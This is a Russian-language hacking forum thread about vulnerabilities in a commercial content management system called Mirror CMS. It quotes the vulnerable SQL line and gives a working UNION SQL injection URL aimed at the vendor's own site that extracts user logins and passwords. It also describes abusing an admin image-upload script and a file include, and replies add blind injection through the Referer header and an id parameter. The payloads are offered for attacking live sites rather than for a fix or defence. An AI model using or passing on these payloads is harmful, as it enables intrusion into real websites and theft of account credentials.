|
Mirror CMS bugs
by me)
коммерческая платная цмс, производитель http://mirrorcms.ru там же представлены все сайты на это цмс Код:
$sSQL="SELECT ".$suffx."_page.title from _page where _page.id='".$_GET['doc']."'";Цитата:
Например офф сайт http://mirrorcms.ru/news/36/ аналогично http://mirrorcms.ru/?ip=news&doc=36 Код:
http://mirrorcms.ru/?ip=news&doc=-1+union+select+1,2,3,concat(usr_login,char(64),usr_password),5,6,7,8,9+from+usertable/*проблема в том что админка при инстале указывается вручную, поэтому стандартно /admin/ встречается на 2-3 сайтах. Вообще отпадает смысл в скуле, если мы находим админку.. тогда идем в http://site.com/админка/template/imageload.php вводим сверху диру где разрешена запись (у меня на 4х сайтах оказалась не просто ?image/ как по дэфолту.. а /stock/images/ и третья уязвиость - локальный инклуд при magic quotes off в index.php PHP код:
|
Цитата:
|
Какой же он локальный? Что мешает залить на народ.ру файл docn.php и инклудить так:
Код:
http://[target]/index.php?ip=http://www.hack.narod.ru |
Мешает file_exists. Инклуд локальный.
|
ммм.. небольшое дополнение..
там же в индексе.. посимвольный (т.к. нет вывода) брут в HTTP_REFERER Код:
stat.php:Капча ./img.php при register_globals on имеем посимвольный брут в параметре id.. кстати.. походу без регистр глобалс сам скрипт не будет работать =) ЗЫ маднет прав. file_exist возвращает тру только при наличие файла на локалхосте +\ если попытаться скормить ему любой вид урла, возвращает false |
| Время: 12:50 |